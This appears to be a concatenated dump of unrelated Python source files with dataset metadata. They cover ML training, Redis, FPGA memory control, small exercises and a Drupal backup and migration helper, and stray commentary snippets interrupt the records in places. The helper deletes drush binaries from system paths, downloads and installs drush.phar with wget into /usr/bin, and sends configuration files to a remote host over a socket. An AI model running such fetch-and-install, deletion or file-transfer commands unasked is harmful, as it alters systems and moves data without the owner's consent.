shuffle=True, **kwargs)\n test_loader = DataLoader(DATA('../data', train=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n MaskTensor(masks, shape),\n transforms.Normalize(*stats)])),\n batch_size=args.test_batch, shuffle=True, **kwargs)\n\n # print('raw data shape')\n # print(train_loader.dataset.train_data.shape)\n model = Net(masks, shape).to(device)\n\n print(str(model)[:-2])\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', verbose=True,\n factor=0.05, cooldown=5, patience=10)\n\n print('[epoch\\tmode\\tloss\\tscore\\taccuracy')\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, epoch)\n scheduler.step(test(args, model, device, test_loader, epoch))\n\n return model\n\n# ''' TEST '''\n# class TestTensor(object):\n# def __init__(self, masks, shape):\n# super(TestTensor, self).__init__()\n# self.shape = shape\n# self.masks = torch.from_numpy(masks).float()\n# def __call__(self, 
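# Sketch of the spatial bookkeeping behind self.x1/self.x2 above: dividing the
# input width by (n1/n0) and then (n2/n1), i.e. by 2 twice, matches the two 2x2
# max-pool steps in forward(); this reading is an inference from the code.
def spatial_after_pools(w, pools=2):
    for _ in range(pools):
        w //= 2
    return w

assert spatial_after_pools(28) == 7    # e.g. MNIST 28x28 -> 7x7 feature maps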
sample):\n# if len(self.masks) == 0:\n# return sample\n# x = sample.view(*shape)\n# X = torch.stack([m * x for m in self.masks], 0)\n# return X\n#\n# class TestNet(nn.Module):\n# def __init__(self, masks, k, n, dim):\n# super(TestNet, self).__init__()\n# ''' in/out '''\n# self.k = k\n# self.dim = dim\n# self.n0 = 1 if len(masks) == 0 else len(masks)\n# self.n = n\n# ''' neurons '''\n# # convolution\n# self.n1 = self.n0 * 10\n# self.n2 = self.n0 * 20\n# self.k1, self.k2 = 4, 4\n# self.s1, self.s2 = 2, 2\n# self.p1 = self.k1 / 2\n# self.p2 = self.k2 / 2\n# self.r1, self.r2 = 2, 2\n#\n# # connected\n# self.n3 = self.n0 * 160 * dim / k\n# self.n4 = self.n0 * 110 * dim / k\n# self.n5 = self.n0 * 50 * dim / k\n#\n# ''' layers '''\n# # convolution\n# self.conv1 = nn.Conv3d(self.n0, self.n1, self.k1, self.s1, self.p1, groups=self.n0)\n# self.conv2 = nn.Conv3d(self.n1, self.n2, self.k2, self.s2, self.p2)#, groups=self.n0)\n# self.conv2_drop = nn.Dropout3d()\n# # connected\n# self.fc1 = nn.Linear(self.n3, self.n4)\n# self.fc2 = nn.Linear(self.n4, self.n5)\n# self.fc3 = nn.Linear(self.n5, self.n)\n#\n# def view(self, x):\n# return x.view(-1, self.n3)\n#\n# def forward(self, x):\n# ''' convolution '''\n# # in -> conv1\n# # print(x.shape)\n# x = self.conv1(x)\n# # print(x.shape)\n# x = F.max_pool3d(x, self.r1)\n# # print(x.shape)\n# x = F.relu(x)\n# # print()\n#\n# # conv1 -> conv2\n# x = self.conv2(x)\n# # print(x.shape)\n# x = self.conv2_drop(x)\n# x = F.max_pool3d(x, self.r2)\n# # print(x.shape)\n# x = F.relu(x)\n# # print()\n#\n#\n# ''' connected '''\n# x = self.view(x)\n# # print(x.shape)\n# # conv2 -> linear1\n# x = self.fc1(x)\n# x = F.relu(x)\n# x = F.dropout(x, training=self.training)\n# # linear1 -> linear2\n# x = self.fc2(x)\n# x = F.relu(x)\n# # linear2 -> linear3 (out)\n# x = self.fc3(x)\n# return F.log_softmax(x, dim=1)\n#\n# # def get_load():\n# # return DataLoader(MNIST('../data', train=True, download=True,\n# # transform = transforms.Compose([transforms.ToTensor()])),\n# # batch_size=1000, shuffle=False)\n# #\n# # def aload(load=get_load()):\n# # p, l = [], []\n# # for data, target in load:\n# # p.append(data)\n# # l.append(target)\n# # p = torch.cat(p, 0).view(-1,28,28)\n# # return p, torch.cat(l)\n","sub_path":"src/cnet.py","file_name":"cnet.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637900933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport re\nimport itertools\nimport pprint\npp = pprint.PrettyPrinter(indent=2)\nfrom sknn.platform import cpu64, threading\nfrom sknn.mlp import Regressor, Layer\nimport numpy\nimport sys\nimport logging\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom sklearn import cross_validation\n\nfrom sklearn.metrics import mean_squared_error as MSE\n\nlogging.basicConfig(\n format=\"%(message)s\",\n level=logging.DEBUG,\n stream=sys.stdout)\n\nimport numpy as np\nimport pandas as pd\n\nNN_ITERATIONS=1\nCV_ITERATIONS=2\n\nfile_in_users=open(\"/home/pascault/data/users_res.csv\",\"r\")\nreader_users = csv.reader(file_in_users)\n\nfile_in_train=open(\"/home/pascault/data/train_res.csv\",\"r\")\nreader_train = csv.reader(file_in_train)\n\nfile_in_words=open(\"/home/pascault/data/words_res.csv\",\"r\")\nreader_words = csv.reader(file_in_words)\n\ncategories_words = reader_words.next()\ncategories_users = reader_users.next()\ncategories_train = reader_train.next()\n\n\ndef 
getMasks(categories, keywords):\n mask=map(lambda x: x in keywords, categories)\n antimask=map(lambda x: not x, mask)\n return (mask, antimask)\n\nmask_words, antimask_words = getMasks(categories_words, [\"Artist\", \"User\"])\nmask_users, antimask_users = getMasks(categories_users, [\"User\"])\nmask_train, antimask_train = getMasks(categories_train, [\"Artist\", \"User\"])\n\nwords = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_words], columns=categories_words)\nusers = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_users], columns=categories_users)\ntrain = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_train], columns=categories_train)\n\njoined1 = pd.merge(train, words, on=[\"Artist\",\"User\"])\ndel(train)\ndel(words)\nattributes = pd.merge(joined1, users, on=\"User\")\nattributes=attributes.apply(lambda x: MinMaxScaler().fit_transform(x))\ndel(users)\n\ndel(joined1)\n\npp.pprint(attributes[:10])\n\n#words = { (row[0], row[1]) : list(itertools.compress(row,mask_words)) for row in reader_words }\n#users = { row[0] : list(itertools.compress(row,mask_users)) for row in reader_users }\n#train = { (row[0], row[2]) : list(itertools.compress(row,mask_train)) for row in reader_train }\n\npp.pprint(attributes.Rating[:10])\n#attributes.Rating=attributes['Rating'].apply(lambda x: MinMaxScaler().fit_transform(x))\n#attributes.Rating=MinMaxScaler().fit_transform(attributes.Rating)\n#pp.pprint(attributes.Rating[:10])\nratings=attributes.Rating.as_matrix()\n\ndel attributes[\"Artist\"]\ndel attributes[\"Rating\"]\n\nattributes = attributes.as_matrix()\n\n\n#test_attributes = attributes[:5000]\n#test_ratings = ratings[:5000]\n\nprint(\"#######################\")\n\n#attributes_train, attributes_test, ratings_train, ratings_test = cross_validation.train_test_split(attributes, ratings, test_size=0.10, random_state=42)\n\nnn = Regressor(\n layers=[\n Layer(\"Sigmoid\", units=40),\n Layer(\"Sigmoid\", units=20),\n Layer(\"Sigmoid\", units=8),\n Layer(\"Linear\")],\n learning_rate=0.02,\n n_iter=NN_ITERATIONS)\n\n#pipeline = Pipeline([\n# ('min/max scaler', MinMaxScaler(feature_range=(0.0, 1.0))),\n# ('neural network', nn)])\n\n#pipeline.fit(attributes_train, ratings_train)\n\nscores = cross_validation.cross_val_score(nn, attributes, ratings, scoring='mean_squared_error', cv=CV_ITERATIONS)\n\n#print(\"Predicted values :\")\n#ratings_result = pipeline.predict(attributes_test)\n#pp.pprint(ratings_result[:10])\n#\n#print(\"Expected values :\")\n#pp.pprint(ratings_test[:10])\n#\n##print(\"Differences :\")\n##diff=result_ratings - test_ratings\n##pp.pprint(diff[:10])\n##\n##rmse = diff.mean()\n#rmse = MSE(100*ratings_test, 100*ratings_result)**.5\n#print(\"RMSE = \"+str(rmse))\n\nprint(\"Scores :\")\nprint(scores)\nprint(\"Mean score :\")\nprint(np.array(scores).mean())\n","sub_path":"importInPython.py","file_name":"importInPython.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441813827","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-04-03 11:21\n# Last modified: 2017-04-03 11:26\n# Filename: trans.py\n# Description:\nimport time\nimport threading\n\nimport redis\n\n\nconn = redis.Redis()\n\n\ndef trans():\n pipeline = conn.pipeline()\n pipeline.incr('trans:')\n time.sleep(.1)\n pipeline.incr('trans:', -1)\n print(pipeline.execute()[0])\n\n\nfor i in range(3):\n 
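# Note as a sketch: in the scikit-learn releases this script targets,
# cross_val_score with scoring='mean_squared_error' returns negated MSE
# (greater-is-better convention), so an RMSE summary of the scores would be:
import numpy as np

scores = np.array([-0.042, -0.051])    # placeholder cross-validation scores
rmse = np.sqrt(-scores).mean()
print(rmse)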
threading.Thread(target=trans).start()\ntime.sleep(.5)\n","sub_path":"Redis/pipeline/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382608453","text":"from migen.fhdl.std import *\nfrom migen.bus import dfi, lasmibus\n\nfrom milkymist.lasmicon.refresher import *\nfrom milkymist.lasmicon.bankmachine import *\nfrom milkymist.lasmicon.multiplexer import *\n\nclass PhySettings:\n\tdef __init__(self, type, dfi_d, nphases, rdphase, wrphase, cmdphase_wr, cmdphase_rd):\n\t\tself.type = type\n\t\tself.dfi_d = dfi_d\n\t\tself.nphases = nphases\n\t\tself.rdphase = rdphase\n\t\tself.wrphase = wrphase\n\t\tself.cmdphase_wr = cmdphase_wr\n\t\tself.cmdphase_rd = cmdphase_rd\n\nclass GeomSettings:\n\tdef __init__(self, bank_a, row_a, col_a):\n\t\tself.bank_a = bank_a\n\t\tself.row_a = row_a\n\t\tself.col_a = col_a\n\t\tself.mux_a = max(row_a, col_a)\n\nclass TimingSettings:\n\tdef __init__(self, tRP, tRCD, tWR, tWTR, tREFI, tRFC, CL, CWL, read_latency, write_latency, read_time, write_time):\n\t\tself.tRP = tRP\n\t\tself.tRCD = tRCD\n\t\tself.tWR = tWR\n\t\tself.tWTR = tWTR\n\t\tself.tREFI = tREFI\n\t\tself.tRFC = tRFC\n\t\t\n\t\tself.CL = CL\n\t\tself.CWL = CWL\n\t\tself.read_latency = read_latency\n\t\tself.write_latency = write_latency\n\t\t\n\t\tself.read_time = read_time\n\t\tself.write_time = write_time\n\nclass LASMIcon(Module):\n\tdef __init__(self, phy_settings, geom_settings, timing_settings):\n\t\tif phy_settings.type in [\"SDR\"]:\n\t\t\tburst_length = phy_settings.nphases*1 # command multiplication*SDR\n\t\telif phy_settings.type in [\"DDR\", \"DDR2\", \"DDR3\"]:\n\t\t\tburst_length = phy_settings.nphases*2 # command multiplication*DDR\n\t\taddress_align = log2_int(burst_length)\n\n\t\tself.dfi = dfi.Interface(geom_settings.mux_a,\n\t\t\tgeom_settings.bank_a,\n\t\t\tphy_settings.dfi_d,\n\t\t\tphy_settings.nphases)\n\t\tself.lasmic = lasmibus.Interface(\n\t\t\taw=geom_settings.row_a + geom_settings.col_a - address_align,\n\t\t\tdw=phy_settings.dfi_d*phy_settings.nphases,\n\t\t\tnbanks=2**geom_settings.bank_a,\n\t\t\tread_latency=timing_settings.read_latency+1,\n\t\t\twrite_latency=timing_settings.write_latency+1)\n\t\tself.nrowbits = geom_settings.col_a - address_align\n\t\n\t\t###\n\n\t\tself.submodules.refresher = Refresher(geom_settings.mux_a, geom_settings.bank_a,\n\t\t\ttiming_settings.tRP, timing_settings.tREFI, timing_settings.tRFC)\n\t\tself.submodules.bank_machines = [BankMachine(geom_settings, timing_settings, address_align, i,\n\t\t\t\tgetattr(self.lasmic, \"bank\"+str(i)))\n\t\t\tfor i in range(2**geom_settings.bank_a)]\n\t\tself.submodules.multiplexer = Multiplexer(phy_settings, geom_settings, timing_settings,\n\t\t\tself.bank_machines, self.refresher,\n\t\t\tself.dfi, self.lasmic)\n\n\tdef get_csrs(self):\n\t\treturn self.multiplexer.get_csrs()\n","sub_path":"milkymist/lasmicon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447196380","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport urllib\nimport urllib2\nimport json\nimport const\nfrom core import retry\n\n_BASE_URL = 'http://deferredjob.sae.sina.com.cn/rest.php'\n\n\nclass Error(Exception):\n \"\"\"Base-class for all exception in this module\"\"\"\n\n\nclass InvalidJobError(Error):\n \"\"\"The job's options is invalid\"\"\"\n\n\nclass 
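# Sketch: redis-py pipelines are transactional (MULTI/EXEC) by default, which
# keeps each INCR/DECR pair above atomic across the three threads; a plain,
# non-transactional batch would be created like this (local server assumed):
import redis

conn = redis.Redis()
pipe = conn.pipeline(transaction=False)    # batching only, no MULTI/EXEC
pipe.incr('trans:')
pipe.incr('trans:', -1)
print(pipe.execute())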
OperationError(Error):\n    \"\"\"operation failed\"\"\"\n\n\nclass TooManyJobsError(Error):\n    \"\"\"Added too many jobs\"\"\"\n\n\nclass InternalError(Error):\n    \"\"\"There was an internal error while accessing deferredjob service, it should be\n    temporary, if the problem continues, please contact us\"\"\"\n\n\nclass Job(dict):\n    def __init__(self, *args, **kwargs):\n        super(Job, self).__init__(*args, **kwargs)\n        self.__dict__ = self\n\n\nclass MySQLImport(Job):\n    def __init__(self, storage_domain, filename, table_name='', callback_url=''):\n        \"\"\"\n        :storage_domain: name of the storage domain that holds the file to import\n        :filename: name of the import file, in the form prefix[.format][.compression], e.g. abc.csv.zip; the service infers the data type from format, which can be sql or csv\n        :table_name: table name to use when the import database type is mysql\n        :callback_url: callback url invoked when the job succeeds; only urls in the app's default version are supported, and no callback is made when empty\n        \"\"\"\n        self['tasktype'] = 'import'\n        self['dbtype'] = 'mysql'\n        self['dbname'] = 'app_{app_name}'.format(app_name=const.APP_NAME)\n\n        self['stor_domain'] = storage_domain.strip()\n        if not self['stor_domain']:\n            raise InvalidJobError(\"storage domain can't be empty!\")\n\n        self['stor_filename'] = filename.strip()\n        if not self['stor_filename']:\n            raise InvalidJobError(\"filename can't be empty!\")\n\n        self['tbname'] = table_name\n        self['callback'] = callback_url\n\n\nclass MySQLExport(Job):\n    def __init__(self, storage_domain, filename, table_name='', callback_url=''):\n        \"\"\"\n        :storage_domain: name of the storage domain for the exported file\n        :filename: name of the export file, in the form prefix[.format][.compression], e.g. abc.csv.zip; the service infers the data type from format, which can be sql or csv\n        :table_name: table name to use when the export database type is mysql\n        :callback_url: callback url invoked when the job succeeds; only urls in the app's default version are supported, and no callback is made when empty\n        \"\"\"\n        self['tasktype'] = 'export'\n        self['dbtype'] = 'mysql'\n        self['dbname'] = 'app_{app_name}'.format(app_name=const.APP_NAME)\n\n        self['stor_domain'] = storage_domain.strip()\n        if not self['stor_domain']:\n            raise InvalidJobError(\"storage domain can't be empty\")\n\n        self['stor_filename'] = filename.strip()\n        if not self['stor_filename']:\n            raise InvalidJobError(\"filename can't be empty\")\n\n        self['tbname'] = table_name\n        self['callback'] = callback_url\n\n\nclass DeferredJob(object):\n\n    \"\"\"Import/export service for large files\"\"\"\n\n    def __init__(self):\n        \"\"\"Initialization\"\"\"\n\n    def add(self, job):\n        \"\"\"Add a job\n        :returns: the job id on success\n        \"\"\"\n        job['function'] = 'add'\n        result = self._remote_call(job)\n        if result['result'] == 0:\n            return int(result['ret'])\n        elif result['result'] == -1:\n            raise InvalidJobError(result['message'])\n        elif result['result'] == -6:\n            raise TooManyJobsError(result['message'])\n        else:\n            raise InternalError(result['message'])\n\n    def status(self, job_id):\n        \"\"\"Get a job's status\n        :job_id: the job id, an integer\n        :returns: on success, the job status: not yet queued: waiting; waiting to run: inqueue; running: excuting; finished: done; failed: abort. Returns False on failure\n        \"\"\"\n        if job_id < 0:\n            raise InvalidJobError('invalid job id')\n        data = {'function': 'getstatus', 'id': job_id}\n        result = self._remote_call(data)\n        if result['result'] == 0:\n            return result['ret']\n        else:\n            raise OperationError(result['message'])\n\n    def delete(self, job_id):\n        \"\"\"Delete a job\n        :job_id: the job id, an integer\n        :returns: True on success; a job that has entered the excuting state cannot be deleted\n        \"\"\"\n        if job_id < 0:\n            raise InvalidJobError('invalid job id')\n        data = {'function': 'delete', 'id': job_id}\n        result = self._remote_call(data)\n        if result['result'] == 0:\n            return True\n        else:\n            raise OperationError(result['message'])\n\n    @retry(InternalError)\n    def _remote_call(self, data):\n        headers = {'SAEAPPNAME': const.APP_NAME}\n        data['result_type'] = 'json'\n        data['from'] = 'api'\n        req = urllib2.Request(url=_BASE_URL, data=urllib.urlencode(data), 
headers=headers)\n        response = urllib2.urlopen(req)\n        if not response.code == 200:\n            raise InternalError()\n        return json.loads(response.read())\n\n\ndef add(job):\n    DeferredJob().add(job)\n","sub_path":"python/deferredjob.py","file_name":"deferredjob.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"356546163","text":"num = 151\n\ndef is_prim(num):\n    # only prime if no divisor is found in the whole range\n    for i in range(2, num):\n        if num % i == 0:\n            return False\n    return True\ndef is_pailn(num):\n    num_p = 0\n    num_t = num\n    while num != 0:\n        num_p = num_p * 10 + num % 10\n        num = num // 10\n    if num_t == num_p:\n        return True\n    else:\n        return False\nif is_prim(num) and is_pailn(num):\n    print(\"yes it is\")\nelse:\n    print(\"no it's not\")\n","sub_path":"basc/palin_prime.py","file_name":"palin_prime.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"497537044","text":"# https://leetcode.com/problems/single-number-iii/\n\nclass Solution(object):\n\n    # Time complexity: O(n)\n    # Space complexity: O(1)\n    def singleNumber(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[int]\n        \"\"\"\n        xor = 0\n        for num in nums:\n            xor ^= num\n\n        lowbit = xor & -xor\n\n        res1 = res2 = 0\n        for num in nums:\n            if num & lowbit != 0:\n                res1 ^= num\n            else:\n                res2 ^= num\n\n        return [res1, res2]","sub_path":"single-number-iii.py","file_name":"single-number-iii.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"537069640","text":"import geom\nimport color\nimport time\n\nimport random\nimport math\n\nimport looping_show\nfrom randomcolor import random_color\nimport tween\n\nclass RYB(looping_show.LoopingShow):\n    # Because we extend LoopingShow we must explicitly override is_show to be True\n    is_show = True\n    \n    name = \"RYB\"\n\n    modifier_usage = {\n        \"toggles\": {\n            0: \"Add 0.25 to brightness\",\n            1: \"Add second 0.25 to brightness\",\n            3: \"Increase speed 2x\",\n        },\n        \"step\": {\n            0: \"Icicles are colored in order\",\n            1: \"Random colors per icicle\",\n            2: \"Rays of color\",\n            3: \"All same color\"\n        },\n        \"intensified\": \"Length of hue range\"\n    }\n\n    def __init__(self, sheep_sides):\n        looping_show.LoopingShow.__init__(self, sheep_sides)\n        self.duration = 32\n\n        # Setup a unique offset for each icicle\n        self.offsets = []\n        for icicle in geom.ICICLES:\n            self.offsets.append(random.random())\n\n\n    def set_controls_model(self, cm):\n        super(RYB, self).set_controls_model(cm)\n        self.control_modifiers_changed()\n\n    def was_selected_randomly(self):\n        self.cm.reset_step_modifiers(random.randrange(3))\n        self.cm.set_modifier(3, (random.randrange(10) > 4))\n        self.cm.set_intensified((random.random() * 2.0) - 1.0)\n\n    def control_modifiers_changed(self):\n        if self.cm.modifiers[3]:\n            self.duration = 16\n        else:\n            self.duration = 32\n\n    def control_step_modifiers_changed(self):\n        mode = self.step_mode(4)\n        if mode in self.modifier_usage[\"step\"]:\n            self.cm.set_message(self.modifier_usage[\"step\"][mode])\n        else:\n            self.cm.set_message(\"Mode %d\" % mode)\n\n    def finalFromRGB(self, rgb):\n        b = 0.5\n        if self.cm.modifiers[0]:\n            b += 0.25\n        if self.cm.modifiers[1]:\n            b += 0.25\n\n        return color.RGB(rgb[0] * b, rgb[1] * b, rgb[2] * b)\n\n    def update_at_progress(self, progress, new_loop, loop_instance):\n        mode = self.step_mode(4)\n\n        if mode == 0:\n            # Color striped from top to bottom by 
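# Worked example of the lowbit trick in the record above: for
# nums = [1, 2, 1, 3, 2, 5], the xor of everything is 3 ^ 5 = 6 (0b110), and
# lowbit = 6 & -6 = 2 separates 3 (bit set) from 5 (bit clear).
nums = [1, 2, 1, 3, 2, 5]
xor = 0
for n in nums:
    xor ^= n
lowbit = xor & -xor
a = b = 0
for n in nums:
    if n & lowbit:
        a ^= n
    else:
        b ^= n
assert {a, b} == {3, 5}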
slices\n v_range = tween.easeInQuad(0.1, 0.98, (self.cm.intensified + 1.0)/2.0)\n #v_range = 0.1 + ((self.cm.intensified + 1.0)/2.0 * 0.89) # how much of the hue cycle to spread across top to bottom\n\n per_slice = v_range / len(geom.ICICLES)\n\n for idx, sl in enumerate(geom.ICICLES):\n hue = progress - (idx * per_slice) + self.offsets[0]\n while hue > 1.0:\n hue -= 1.0\n while hue < 0.0:\n hue += 1.0\n\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n\n # Now factor in an intensity\n # v = 0.2 + (((self.cm.intensified + 1.0) / 2.0) * 0.8)\n\n # rgb = color.RGB(*rgbTuple)\n # rgb = color.RGB(rgbTuple[0] * v, rgbTuple[1] * v, rgbTuple[2] * v)\n\n self.ss.party.set_cells(sl, self.finalFromRGB(rgbTuple))\n\n\n elif mode == 1:\n # Each icicle gets a unique color based on it's offset\n for idx,icicle in enumerate(geom.ICICLES):\n hue = progress + self.offsets[idx]\n if hue > 1.0:\n hue -= 1.0\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n # rgb = color.RGB(*rgbTuple)\n\n self.ss.party.set_cells(icicle, self.finalFromRGB(rgbTuple))\n\n elif mode == 2:\n # Set colors element by element in each ring based on radial\n for ring_ix, ring in enumerate(geom.RINGS):\n step = 1.0 / len(ring)\n\n for tube_ix, tube in enumerate(ring):\n hue = progress + self.offsets[0] + tube_ix * step\n while hue > 1.0:\n hue -= 1.0\n while hue < 0.0:\n hue += 1.0\n\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n # rgb = color.RGB(*rgbTuple)\n\n self.ss.party.set_cell(tube, self.finalFromRGB(rgbTuple))\n\n\n else:\n # Everything the same color\n hsv = (progress + self.offsets[0], 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n self.ss.party.set_all_cells(self.finalFromRGB(rgbTuple))\n\n\n \n","sub_path":"deployments/ght_apr_2016/shows/ryb.py","file_name":"ryb.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"50762542","text":"HUE_BRIDGE_IP = '192.168.2.4'\nHUE_BRIDGE_USER = 'newdeveloper'\nHUE_BRIDGE_PORT = '80'\nHUE_LIGHT_ID = 9\n\nTOTAL_DURATION_MINUTES = 30\n\nBUIENRADAR_WEATHER_STATION = '6278'\nBUIENRADAR_MEASUREMENT = 'temperatuur10cm' # Should only be 'temperatuurGC' or 'temperatuur10cm'\n\n# Color which is picked is always the one 'above' the offset.\n# If it's 12.5 degrees, it will be an orange color\nTEMPERATURE_COLORS = {\n -100: (255,255,255), # Hell freezing over White\n 0: (15, 255, 255), # Freezing Cool Mint Blue\n 6: (0, 172, 230), # Freezing Blue\n 10: (230, 187, 0), # Pretty cold Yellow\n 15: (50, 230, 0), # Chilly Green\n 20: (230, 130, 0), # Convenient Orange\n 99: (214, 0, 0) # YH cool Superhot Red\n}","sub_path":"config/settings_base.py","file_name":"settings_base.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"38057624","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nimport socket\nimport re\nimport time\nimport struct\nimport datetime \n\ndef backUP(DOC,sitio):\n\ts1 = \"\"\n\tf = open(DOC, \"r\")\n\tfor linea in f:\n\t if linea.lower().find(\"documentroot\") != -1:\n\t pat = re.compile(\".*#.*documentroot.*\")\n\t result = pat.match(linea.lower())\n\t if(result == None):\n\t l1 = linea.split()\n\t for j in l1[1:]:\n\t s1+=j+' '\n\t s = s1.split('#')\n\t cad = s[0].rstrip().lstrip()\n\t break\n\tf.close()\n\tdateTimeObj = datetime.datetime.now()\n\ttimestampStr = 
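# Illustrative sketch: one way to implement the "color above the offset"
# lookup that the settings comment describes, picking the smallest threshold
# at or above the reading; the mini color table here is truncated for brevity.
TEMPERATURE_COLORS = {0: (15, 255, 255), 6: (0, 172, 230), 10: (230, 187, 0)}

def color_for(temp):
    return TEMPERATURE_COLORS[min(k for k in TEMPERATURE_COLORS if k >= temp)]

assert color_for(7.5) == (230, 187, 0)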
dateTimeObj.strftime(\"%H_%M_%S_%f-%d-%b-%Y.tar.gz\")\n\tsubprocess.Popen(['drush', 'archive-dump', '--destination=/var/www/bck'+sitio+timestampStr,'-r',cad]).wait()\n\tprint(\"Respaldo Creado\")\n\ndef downloadDrush(type):\n\tif(type):\n\t\tcomands = [\"/usr/local/sbin/drush\",\"/usr/local/bin/drush\",\n\t\t\"/usr/sbin/drush\", \"/usr/bin/drush\",\"/sbin/drush\",\"/bin/drush\"]\n\t\tfor c in comands :\n\t\t\tsubprocess.Popen(['rm',c],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\t\tsubprocess.Popen(['apt-get','purge','drush','-y'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['wget','https://github.com/drush-ops/drush/releases/download/8.3.2/drush.phar'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['chmod','+x','drush.phar'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['mv','drush.phar','/usr/bin/drush'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\ndef verificandoDrush():\n\ttry:\n\t\tdrush = subprocess.Popen(['drush','--version'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n\t\tversion = drush.stdout.read().decode().find('8.3.2')\n\t\tif (version == -1 ):\n\t\t\tprint(\"Actualizando drush\")\n\t\t\tdownloadDrush(True)\n\texcept FileNotFoundError:\n\t\tprint(\"Instalando drush\")\n\t\tdownloadDrush(False)\n\tprint(\"Drush instalado/actualizado\")\n\t\n\ndef verificandoGit():\n\ttry:\n\t\tgit = subprocess.Popen(['git'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n\texcept FileNotFoundError:\n\t\tprint(\"Instalando git\")\n\t\tsubprocess.Popen(['apt-get','install','git'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tprint(\"Git instalado\")\t\n\ndef exportSiteConfig(IP,DOC,DOC2):\n\tf = open (DOC, \"rb\")\n\tl = f.read(1000000)\n\tf2 = open (DOC2, \"rb\")\n\tl2 = f2.read(1000000)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tconnected = False\n\tprint(\"Esperando conexion para mandar archivo\", end = '', flush=True)\n\twhile not connected:\n\t\ttry:\n\t\t\ttime.sleep(1)\n\t\t\ts.connect((IP,1331))\n\t\t\tconnected = True\n\t\texcept Exception as e:\n\t\t\tprint(\". \", end = '', flush=True)\n\ts.sendall(bytes(DOC, 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"\\n\\nRespuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(l)\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(' ', 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(DOC2, 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"\\n\\nRespuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(l2)\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(' ', 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\tf.close()\n\tf2.close()\n\ts.close()\n\nverificandoDrush()\nverificandoGit()\n\"\"\"\nflag = False\npat = re.compile(\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\nIP = input('Ingrese la ip del host:\\n')\nresult = pat.match(IP)\nwhile result == None:\n\tIP = input('[!] Ingrese una ip correcta:\\n')\n\tresult = pat.match(IP)\n\nDOC = input('Ingrese la ruta absoluta del archivo de configuración del sitio1\\n')\nwhile(os.path.isfile(\"DOC) == False):\n DOC = input(\"[!] Ingresa la ruta completa del archivo de configuración.\\n\")\n\nDOC2 = input('Ingrese la ruta absoluta del archivo de configuración del sitio1\\n')\nwhile(os.path.isfile(\"DOC2) == False):\n DOC2 = input(\"[!] 
